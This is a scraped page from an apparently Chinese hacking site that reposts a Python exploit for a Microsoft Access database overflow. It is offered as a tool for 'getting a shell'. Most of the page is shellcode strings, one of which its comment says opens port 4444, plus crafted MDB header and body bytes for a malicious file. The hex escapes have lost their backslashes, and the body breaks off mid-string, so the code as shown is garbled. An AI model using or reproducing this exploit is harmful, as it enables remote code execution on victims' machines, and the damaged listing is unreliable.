python版本的Access溢出利用程序

作者:源码世界时间:2014-04-01分类:Python评论:0浏览:5390

JSP AJAX THINKPHP 客户端IP
		

   首 页 ┆ 文章中心 ┆ 黑客工具 ┆ 黑吧学院 ┆ 技术论坛 ┆ 安全培训 ┆ 免费频道 ┆ 最近更新 ┆ 瑞星在线杀毒
┆ 黑吧百度 ┆ 繁體中文
 
 
 
   设为首页
加入收藏
发布教程
入侵检测 | IM安全 | 远程控制 | 破解加密 | 综合教程 | 安全软件 | 常用工具 | 会员区 | 视频教程 | 一日一教 
资讯中心 | 漏洞公告 | 入侵检测 | 网络技巧 | 安全防护 | 操作系统 | 免费资源    软件下载 新闻资讯   
 
 
 
 
 您当前的位置:-黑客动画吧 -> 文章中心 -> 入侵检测 -> 编程代码 -> 文章内容  退出登录  用户管理
 
 
分类导航
 
 
 
 
· 推荐文章
· 热门文章
· 最新文章
  
 
热门文章
 
 
 
 
· 如何封别人QQ
· 充QQ币的疯狂——宽...
· 免费得QB
· 400秒远程攻破你的Q...
· [图文] QQ免费建400个群
· [组图] 给你一台永远不关机...
· [注意] QQ宠物砸蛋秘诀
· 再次有机会免费获得...
· 想的挂QQvip的进
· 在QQ中将自己从对方...
 
  
 
相关文章
 
 
 
 
· IE 0day for ... 
· python版本的... 
· 绕过卡巴主动... 
· 超星浏览器4.... 
· Tomcat后台拿... 
· dedecms v5.1... 
· phpMyAdmin 后... 
· Dos命令加锁 ... 
 
-
 
  
 
 python版本的Access溢出利用程序
 
作者:佚名  来源:转载  发布时间:2008-9-22 0:43:31  发布人:noangel
减小字体 增大字体  颜色 默认 灰度 橄榄色 绿色 蓝色 褐色 红色


【收藏到ViVi】【收藏到YouNote】【收藏此页到365Key】【 收藏此页到bbmao】

#python版本的Access溢出利用程序,改的国外的,用了好多年了,依然好用。拿Shell好用
import sys
import struct

 

# the code to open port 4444 for test

friddy  = "xebx10x5bx4bx33xc9x66xb9x33x01x80x34x0bxf8xe2xfa"
friddy += "xebx05xe8xebxffxffxffx11xfdxf9xf8xf8xa7x9cx59xc8"
friddy += "xf8xf8xf8x73xb8xf4x73x88xe4x55x73x90xf0x73x0fx92"
friddy += "xfbxa1x10x5dxf8xf8xf8x1ax01x90xcbxcaxf8xf8x90x8f"
friddy += "x8bxcaxa7xacx07xeex73x10x92xfdxa1x10x74xf8xf8xf8"
friddy += "x1ax01x7bx3fxfcx79x14x68xf9xf8xf8xacx90xf9xf9xf8"
friddy += "xf8x07xaexf4xa8xa8xa8xa8x92xf9x92xfax07xaexe8x73"
friddy += "x20xcbx38xa8xa8x9ex73xaexd8x7ex2ex39x32xe8x9ex42"
friddy += "xfaxf8xaax73x2cx92xe8xaaxabx07xaexecx92xf9xabx07"
friddy += "xaexe0xa8xa8xabx07xaexe4x73x20x90x9bx95x9cxf8x75"
friddy += "xecxdcx7bx14xacx73x04x92xecxa1xcbx38x71xfcx77x1a"
friddy += "x03x3exbfxe8xbcx06xbfxc4x06xbfxc5x71xa7xb0x71xa7"
friddy += "xb4x71xa7xa8x75xbfxe8xafxa8xa9xa9xa9x92xf9xa9xa9"
friddy += "xaaxa9x07xaexfcxcbx38xb0xa8x07xaexf0xa9xaex73x8d"
friddy += "xc4x73x8cxd6x80xfbx0dxaex73x8exd8xfbx0dxcbx31xb1"
friddy += "xb9x55xfbx3dxcbx23xf7x46xe8xc2x2ex8cxf0x39x33xff"
friddy += "xfbx22xb8x13x09xc3xe7x8dx1fxa6x73xa6xdcxfbx25x9e"
friddy += "x73xf4xb3x73xa6xe4xfbx25x73xfcx73xfbx3dx53xa6xa1"
friddy += "x3bx10x0ex06x07x07xcax8cx69xf4x31x44x5ex93x77x0a"
friddy += "xe0x99xc5x92x4cx78xd5xcax80x26x9cxe8x5fx25xf4x67"
friddy += "x2bxb3x49xe6x6fxf9xa4xe9x47x1d"

 

Shellcode_p1  = "x31xc9x83xe9xb7xd9xeexd9x74x24xf4x5bx81x73x13x97"
Shellcode_p1 += "x25xaaxb5x83xebxfcxe2xf4x6bx4fx41xfax7fxdcx55x4a"
Shellcode_p1 += "x68x45x21xd9xb3x01x21xf0xabxaexd6xb0xefx24x45x3e"
Shellcode_p1 += "xd8x3dx21xeaxb7x24x41x56xa7x6cx21x81x1cx24x44x84"
Shellcode_p1 += "x57xbcx06x31x57x51xadx74x5dx28xabx77x7cxd1x91xe1"
Shellcode_p1 += "xb3x0dxdfx56x1cx7ax8exb4x7cx43x21xb9xdcxaexf5xa9"
Shellcode_p1 += "x96xcexa9x99x1cxacxc6x91x8bx44x69x84x57x41x21xf5"
Shellcode_p1 += "xa7xaexeaxb9x1cx55xb6x18x1cx65xa2xebxffxabxe4xbb"
Shellcode_p1 += "x7bx75x55x63xa6xfexccxe6xf1x4dx99x87xffx52xd9x87"
Shellcode_p1 += "xc8x71x55x65xffxeex47x49xacx75x55x63xc8xacx4fxd3"
Shellcode_p1 += "x16xc8xa2xb7xc2x4fxa8x4ax47x4dx73xbcx62x88xfdx4a"
Shellcode_p1 += "x41x76xf9xe6xc4x66xf9xf6xc4xdax7axdd"
Shellcode_p2  = "xf1x76x23x54x02x4dx46x4cx3dx45xfdx4a"
Shellcode_p2 += "x41x4fxbaxe4xc2xdax7axd3xfdx41xccxddxf4x48xc0xe5"
Shellcode_p2 += "xcex0cx66x3cx70x4fxeex3cx75x14x6ax46x3dxb0x23x48"
Shellcode_p2 += "x69x67x87x4bxd5x09x27xcfxafx8ex01x1exffx57x54x06"
Shellcode_p2 += "x81xdaxdfx9dx68xf3xf1xe2xc5x74xfbxe4xfdx24xfbxe4"
Shellcode_p2 += "xc2x74x55x65xffx88x73xb0x59x76x55x63xfdxdax55x82"
Shellcode_p2 += "x68xf5xc2x52xeexe3xd3x4axe2x21x55x63x68x52x56x4a"
Shellcode_p2 += "x47x4dx5ax3fx93x7axf9x4ax41xdax7axb5"


# Header
mdbHeader  = "x00x01x00x00x53x74x61x6Ex64x61x72x64x20x4Ax65x74"
mdbHeader += "x20x44x42x00x01x00x00x00xB5x6Ex03x62x60x09xC2x55"
mdbHeader += "xE9xA9x67x72x40x3Fx00x9Cx7Ex9Fx90xFFx85x9Ax31xC5"
mdbHeader += "x79xBAxEDx30xBCxDFxCCx9Dx63xD9xE4xC3x9Fx46xFBx8A"
mdbHeader += "xBCx4ExB2x6DxECx37x69xD2x9CxFAxF2xC8x28xE6x27x20"
mdbHeader += "x8Ax60x60x02x7Bx36xC1xE4xDFxB1x43x62x13x43xFBx39"
mdbHeader += "xB1x33x00xF7x79x5BxA6x23x7Cx2AxAFxD0x7Cx99x08x1F"
mdbHeader += "x98xFDx1BxC9x5Ax6AxE2xF8x82x66x5Fx95xF8xD0x89x24"
mdbHeader += "x85x67xC6x1Fx27x44xD2xEExCFx65xEDxFFx07xC7x46xA1"
mdbHeader += "x78x16x0CxEDxE9x2Dx62xD4x54x06x00x00x34x2Ex30x00"


# Body
mdbBody  = "x00x00x80xFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFF"
mdbBody += "xFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFF"
mdbBody += "xFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFF"
mdbBody += "xFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFF"
mdbBody += "x02x01xDEx0Bx00x00x00x00x90x90x90x90x59x06x00x00"
mdbBody += "x11x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
mdbBody += "x00x00x00x00x00x00x00x00x53x11x00x0Bx00x11x00x02"
mdbBody += "x00x00x00x02x00x00x00x00x06x00x00x01x06x00x00x00"
mdbBody += "x00x00x00x11x00x00x00x00x00x00x00x00x00x00x00x11"
mdbBody += "x00x00x00x00x00x00x00x0Cx59x06x00x00x09x00x03x00"
mdbBody += "x00x00x09x04x00x00x12x00x00x00x00x00x00x00x00x00"
mdbBody += "x0Cx59x06x00x00x08x00x02x00x00x00x09x04x00x00x12"
mdbBody += "x00x00x00x00x00x00x00x00x00x08x59x06x00x00x04x00"
mdbBody += "x01x00x00x00x09x04x00x00x13x00x00x00x00x00x0ax00"
mdbBody += "x08x00x08x59x06x00x00x05x00x01x00x00x00x09x04x00"
mdbBody += "x00x13x00x00x00x00x00x12x00x08x00x04x59x06x00x00"
mdbBody += "x07x00x02x00x00x00x09x04x00x00x13x00x00x00x00x00"
mdbBody += "x1Ax00x04x00x0Ax59x06x00x00x0Ax00x04x00x00x00x09"
mdbBody += "x04x00x00x12x00x00x00x00x00x00x00xFEx01x04x59x06"
mdbBody += "x00x00x00x00x00x00x00x00x09x04x00x00x13x00x00x00"
mdbBody += "x00x00x00x00x04x00x0Bx59x06x00x00x0Dx00x07x00x00"
mdbBody += "x00x09x04x00x00x12x00x00x00x00x00x00x00x00x00x0B"
mdbBody += "x59

如果您没有找到适合你的解决方案,请联系我们寻求帮助支付鼓励

标签:JSP   AJAX   THINKPHP   客户端IP  
返回顶部
分享按钮